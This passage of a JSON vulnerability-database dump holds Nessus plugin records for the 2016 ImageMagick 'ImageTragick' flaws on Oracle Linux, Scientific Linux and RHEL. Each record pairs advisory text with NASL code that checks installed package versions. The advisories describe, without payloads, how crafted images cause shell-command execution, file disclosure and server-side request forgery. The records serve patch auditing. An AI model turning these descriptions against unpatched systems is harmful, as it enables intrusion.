ImageMagick utilities, would allow the attacker to delete, move, or disclose the contents of arbitrary files. (CVE-2016-3715, CVE-2016-3716, CVE-2016-3717)\n\n* A server-side request forgery flaw was discovered in the way ImageMagick processed certain images. A remote attacker could exploit this flaw to mislead an application using ImageMagick or an unsuspecting user using the ImageMagick utilities into, for example, performing HTTP(S) requests or opening FTP sessions via specially crafted images. (CVE-2016-3718)\n\nNote: This update contains an updated /etc/ImageMagick/policy.xml file that disables the EPHEMERAL, HTTPS, HTTP, URL, FTP, MVG, MSL, TEXT, and LABEL coders. If you experience any problems after the update, it may be necessary to manually adjust the policy.xml file to match your requirements. Please take additional precautions to ensure that your applications using the ImageMagick library do not process malicious or untrusted files before doing so.", "cvss3": {"score": 8.4, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-05-11T00:00:00", "type": "nessus", "title": "Oracle Linux 6 / 7 : ImageMagick (ELSA-2016-0726) (ImageTragick)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-3714", "CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3717", "CVE-2016-3718"], "modified": "2021-11-30T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:ImageMagick", "p-cpe:/a:oracle:linux:imagemagick-c%2b%2b", "p-cpe:/a:oracle:linux:imagemagick-c%2b%2b-devel", "p-cpe:/a:oracle:linux:ImageMagick-devel", "p-cpe:/a:oracle:linux:ImageMagick-doc", "p-cpe:/a:oracle:linux:ImageMagick-perl", "cpe:/o:oracle:linux:6", "cpe:/o:oracle:linux:7"], "id": "ORACLELINUX_ELSA-2016-0726.NASL", "href": "https://www.tenable.com/plugins/nessus/91032", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2016:0726 and \n# Oracle Linux Security Advisory ELSA-2016-0726 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(91032);\n script_version(\"2.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\"CVE-2016-3714\", \"CVE-2016-3715\", \"CVE-2016-3716\", \"CVE-2016-3717\", \"CVE-2016-3718\");\n script_xref(name:\"RHSA\", value:\"2016:0726\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Oracle Linux 6 / 7 : ImageMagick (ELSA-2016-0726) (ImageTragick)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2016:0726 :\n\nAn update for ImageMagick is now available for Red Hat Enterprise\nLinux 6 and Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nImageMagick is an image display and manipulation tool for the X Window\nSystem that can read and write multiple image formats.\n\nSecurity Fix(es) :\n\n* It was discovered that ImageMagick did not properly sanitize certain\ninput before passing it to the delegate functionality. A remote\nattacker could create a specially crafted image that, when processed\nby an application using ImageMagick or an unsuspecting user using the\nImageMagick utilities, would lead to arbitrary execution of shell\ncommands with the privileges of the user running the application.\n(CVE-2016-3714)\n\n* It was discovered that certain ImageMagick coders and\npseudo-protocols did not properly prevent security sensitive\noperations when processing specially crafted images. A remote attacker\ncould create a specially crafted image that, when processed by an\napplication using ImageMagick or an unsuspecting user using the\nImageMagick utilities, would allow the attacker to delete, move, or\ndisclose the contents of arbitrary files. (CVE-2016-3715,\nCVE-2016-3716, CVE-2016-3717)\n\n* A server-side request forgery flaw was discovered in the way\nImageMagick processed certain images. A remote attacker could exploit\nthis flaw to mislead an application using ImageMagick or an\nunsuspecting user using the ImageMagick utilities into, for example,\nperforming HTTP(S) requests or opening FTP sessions via specially\ncrafted images. (CVE-2016-3718)\n\nNote: This update contains an updated /etc/ImageMagick/policy.xml file\nthat disables the EPHEMERAL, HTTPS, HTTP, URL, FTP, MVG, MSL, TEXT,\nand LABEL coders. If you experience any problems after the update, it\nmay be necessary to manually adjust the policy.xml file to match your\nrequirements. Please take additional precautions to ensure that your\napplications using the ImageMagick library do not process malicious or\nuntrusted files before doing so.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2016-May/006020.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2016-May/006021.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected imagemagick packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ImageMagick\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ImageMagick-c++\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ImageMagick-c++-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ImageMagick-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ImageMagick-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ImageMagick-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/05/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/11\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6 / 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", reference:\"ImageMagick-6.7.2.7-4.el6_7\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"ImageMagick-c++-6.7.2.7-4.el6_7\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"ImageMagick-c++-devel-6.7.2.7-4.el6_7\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"ImageMagick-devel-6.7.2.7-4.el6_7\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"ImageMagick-doc-6.7.2.7-4.el6_7\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"ImageMagick-perl-6.7.2.7-4.el6_7\")) flag++;\n\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"ImageMagick-6.7.8.9-13.el7_2\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"ImageMagick-c++-6.7.8.9-13.el7_2\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"ImageMagick-c++-devel-6.7.8.9-13.el7_2\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"ImageMagick-devel-6.7.8.9-13.el7_2\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"ImageMagick-doc-6.7.8.9-13.el7_2\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"ImageMagick-perl-6.7.8.9-13.el7_2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ImageMagick / ImageMagick-c++ / ImageMagick-c++-devel / etc\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-27T14:55:33", "description": "Security Fix(es) :\n\n - It was discovered that ImageMagick did not properly sanitize certain input before passing it to the delegate functionality. A remote attacker could create a specially crafted image that, when processed by an application using ImageMagick or an unsuspecting user using the ImageMagick utilities, would lead to arbitrary execution of shell commands with the privileges of the user running the application. (CVE-2016-3714)\n\n - It was discovered that certain ImageMagick coders and pseudo-protocols did not properly prevent security sensitive operations when processing specially crafted images. A remote attacker could create a specially crafted image that, when processed by an application using ImageMagick or an unsuspecting user using the ImageMagick utilities, would allow the attacker to delete, move, or disclose the contents of arbitrary files. (CVE-2016-3715, CVE-2016-3716, CVE-2016-3717)\n\n - A server-side request forgery flaw was discovered in the way ImageMagick processed certain images. A remote attacker could exploit this flaw to mislead an application using ImageMagick or an unsuspecting user using the ImageMagick utilities into, for example, performing HTTP(S) requests or opening FTP sessions via specially crafted images. (CVE-2016-3718)\n\nNote: This update contains an updated /etc/ImageMagick/policy.xml file that disables the EPHEMERAL, HTTPS, HTTP, URL, FTP, MVG, MSL, TEXT, and LABEL coders. If you experience any problems after the update, it may be necessary to manually adjust the policy.xml file to match your requirements. Please take additional precautions to ensure that your applications using the ImageMagick library do not process malicious or untrusted files before doing so.", "cvss3": {"score": 8.4, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-05-11T00:00:00", "type": "nessus", "title": "Scientific Linux Security Update : ImageMagick on SL6.x, SL7.x i386/x86_64 (20160509) (ImageTragick)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-3714", "CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3717", "CVE-2016-3718"], "modified": "2021-11-30T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:ImageMagick", "p-cpe:/a:fermilab:scientific_linux:imagemagick-c%2b%2b", "p-cpe:/a:fermilab:scientific_linux:imagemagick-c%2b%2b-devel", "p-cpe:/a:fermilab:scientific_linux:ImageMagick-debuginfo", "p-cpe:/a:fermilab:scientific_linux:ImageMagick-devel", "p-cpe:/a:fermilab:scientific_linux:ImageMagick-doc", "p-cpe:/a:fermilab:scientific_linux:ImageMagick-perl", "x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20160509_IMAGEMAGICK_ON_SL6_X.NASL", "href": "https://www.tenable.com/plugins/nessus/91039", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(91039);\n script_version(\"2.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\"CVE-2016-3714\", \"CVE-2016-3715\", \"CVE-2016-3716\", \"CVE-2016-3717\", \"CVE-2016-3718\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Scientific Linux Security Update : ImageMagick on SL6.x, SL7.x i386/x86_64 (20160509) (ImageTragick)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security Fix(es) :\n\n - It was discovered that ImageMagick did not properly\n sanitize certain input before passing it to the delegate\n functionality. A remote attacker could create a\n specially crafted image that, when processed by an\n application using ImageMagick or an unsuspecting user\n using the ImageMagick utilities, would lead to arbitrary\n execution of shell commands with the privileges of the\n user running the application. (CVE-2016-3714)\n\n - It was discovered that certain ImageMagick coders and\n pseudo-protocols did not properly prevent security\n sensitive operations when processing specially crafted\n images. A remote attacker could create a specially\n crafted image that, when processed by an application\n using ImageMagick or an unsuspecting user using the\n ImageMagick utilities, would allow the attacker to\n delete, move, or disclose the contents of arbitrary\n files. (CVE-2016-3715, CVE-2016-3716, CVE-2016-3717)\n\n - A server-side request forgery flaw was discovered in the\n way ImageMagick processed certain images. A remote\n attacker could exploit this flaw to mislead an\n application using ImageMagick or an unsuspecting user\n using the ImageMagick utilities into, for example,\n performing HTTP(S) requests or opening FTP sessions via\n specially crafted images. (CVE-2016-3718)\n\nNote: This update contains an updated /etc/ImageMagick/policy.xml file\nthat disables the EPHEMERAL, HTTPS, HTTP, URL, FTP, MVG, MSL, TEXT,\nand LABEL coders. If you experience any problems after the update, it\nmay be necessary to manually adjust the policy.xml file to match your\nrequirements. Please take additional precautions to ensure that your\napplications using the ImageMagick library do not process malicious or\nuntrusted files before doing so.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1605&L=scientific-linux-errata&F=&S=&P=1966\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?46d0d048\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:ImageMagick\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:ImageMagick-c++\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:ImageMagick-c++-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:ImageMagick-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:ImageMagick-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:ImageMagick-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:ImageMagick-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/05/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/11\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 7.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL6\", reference:\"ImageMagick-6.7.2.7-4.el6_7\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"ImageMagick-c++-6.7.2.7-4.el6_7\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"ImageMagick-c++-devel-6.7.2.7-4.el6_7\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"ImageMagick-debuginfo-6.7.2.7-4.el6_7\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"ImageMagick-devel-6.7.2.7-4.el6_7\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"ImageMagick-doc-6.7.2.7-4.el6_7\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"ImageMagick-perl-6.7.2.7-4.el6_7\")) flag++;\n\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"ImageMagick-6.7.8.9-13.el7_2\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"ImageMagick-c++-6.7.8.9-13.el7_2\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"ImageMagick-c++-devel-6.7.8.9-13.el7_2\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"ImageMagick-debuginfo-6.7.8.9-13.el7_2\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"ImageMagick-devel-6.7.8.9-13.el7_2\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"ImageMagick-doc-6.7.8.9-13.el7_2\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"ImageMagick-perl-6.7.8.9-13.el7_2\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ImageMagick / ImageMagick-c++ / ImageMagick-c++-devel / etc\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-27T14:55:41", "description": "An update for ImageMagick is now available for Red Hat Enterprise Linux 6 and Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nImageMagick is an image display and manipulation tool for the X Window System that can read and write multiple image formats.\n\nSecurity Fix(es) :\n\n* It was discovered that ImageMagick did not properly sanitize certain input before passing it to the delegate functionality. A remote attacker could create a specially crafted image that, when processed by an application using ImageMagick or an unsuspecting user using the ImageMagick utilities, would lead to arbitrary execution of shell commands with the privileges of the user running the application.\n(CVE-2016-3714)\n\n* It was discovered that certain ImageMagick coders and pseudo-protocols did not properly prevent security sensitive operations when processing specially crafted images. A remote attacker could create a specially crafted image that, when processed by an application using ImageMagick or an unsuspecting user using the ImageMagick utilities, would allow the attacker to delete, move, or disclose the contents of arbitrary files. (CVE-2016-3715, CVE-2016-3716, CVE-2016-3717)\n\n* A server-side request forgery flaw was discovered in the way ImageMagick processed certain images. A remote attacker could exploit this flaw to mislead an application using ImageMagick or an unsuspecting user using the ImageMagick utilities into, for example, performing HTTP(S) requests or opening FTP sessions via specially crafted images. (CVE-2016-3718)\n\nNote: This update contains an updated /etc/ImageMagick/policy.xml file that disables the EPHEMERAL, HTTPS, HTTP, URL, FTP, MVG, MSL, TEXT, and LABEL coders. If you experience any problems after the update, it may be necessary to manually adjust the policy.xml file to match your requirements. Please take additional precautions to ensure that your applications using the ImageMagick library do not process malicious or untrusted files before doing so.", "cvss3": {"score": 8.4, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-05-11T00:00:00", "type": "nessus", "title": "RHEL 6 / 7 : ImageMagick (RHSA-2016:0726) (ImageTragick)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-3714", "CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3717", "CVE-2016-3718"], "modified": "2021-11-30T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:ImageMagick", "p-cpe:/a:redhat:enterprise_linux:imagemagick-c%5c%2b%5c%2b", "p-cpe:/a:redhat:enterprise_linux:imagemagick-c%5c%2b%5c%2b-devel", "p-cpe:/a:redhat:enterprise_linux:ImageMagick-debuginfo", "p-cpe:/a:redhat:enterprise_linux:ImageMagick-devel", "p-cpe:/a:redhat:enterprise_linux:ImageMagick-doc", "p-cpe:/a:redhat:enterprise_linux:ImageMagick-perl", "cpe:/o:redhat:enterprise_linux:6", "cpe:/o:redhat:enterprise_linux:6.7", "cpe:/o:redhat:enterprise_linux:7", "cpe:/o:redhat:enterprise_linux:7.2", "cpe:/o:redhat:enterprise_linux:7.3", "cpe:/o:redhat:enterprise_linux:7.4", "cpe:/o:redhat:enterprise_linux:7.5", "cpe:/o:redhat:enterprise_linux:7.6", "cpe:/o:redhat:enterprise_linux:7.7"], "id": "REDHAT-RHSA-2016-0726.NASL", "href": "https://www.tenable.com/plugins/nessus/91036", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2016:0726. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(91036);\n script_version(\"2.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\"CVE-2016-3714\", \"CVE-2016-3715\", \"CVE-2016-3716\", \"CVE-2016-3717\", \"CVE-2016-3718\");\n script_xref(name:\"RHSA\", value:\"2016:0726\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"RHEL 6 / 7 : ImageMagick (RHSA-2016:0726) (ImageTragick)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"An update for ImageMagick is now available for Red Hat Enterprise\nLinux 6 and Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nImageMagick is an image display and manipulation tool for the X Window\nSystem that can read and write multiple image formats.\n\nSecurity Fix(es) :\n\n* It was discovered that ImageMagick did not properly sanitize certain\ninput before passing it to the delegate functionality. A remote\nattacker could create a specially crafted image that, when processed\nby an application using ImageMagick or an unsuspecting user using the\nImageMagick utilities, would lead to arbitrary execution of shell\ncommands with the privileges of the user running the application.\n(CVE-2016-3714)\n\n* It was discovered that certain ImageMagick coders and\npseudo-protocols did not properly prevent security sensitive\noperations when processing specially crafted images. A remote attacker\ncould create a specially crafted image that, when processed by an\napplication using ImageMagick or an unsuspecting user using the\nImageMagick utilities, would allow the attacker to delete, move, or\ndisclose the contents of arbitrary files. (CVE-2016-3715,\nCVE-2016-3716, CVE-2016-3717)\n\n* A server-side request forgery flaw was discovered in the way\nImageMagick processed certain images. A remote attacker could exploit\nthis flaw to mislead an application using ImageMagick or an\nunsuspecting user using the ImageMagick utilities into, for example,\nperforming HTTP(S) requests or opening FTP sessions via specially\ncrafted images. (CVE-2016-3718)\n\nNote: This update contains an updated /etc/ImageMagick/policy.xml file\nthat disables the EPHEMERAL, HTTPS, HTTP, URL, FTP, MVG, MSL, TEXT,\nand LABEL coders. If you experience any problems after the update, it\nmay be necessary to manually adjust the policy.xml file to match your\nrequirements. Please take additional precautions to ensure that your\napplications using the ImageMagick library do not process malicious or\nuntrusted files before doing so.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2016:0726\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-3714\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-3715\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-3716\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-3717\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-3718\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ImageMagick\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ImageMagick-c\\+\\+\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ImageMagick-c\\+\\+-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ImageMagick-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ImageMagick-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ImageMagick-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ImageMagick-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.4\");\n script_set_attribute(attribute:\"cpe\", 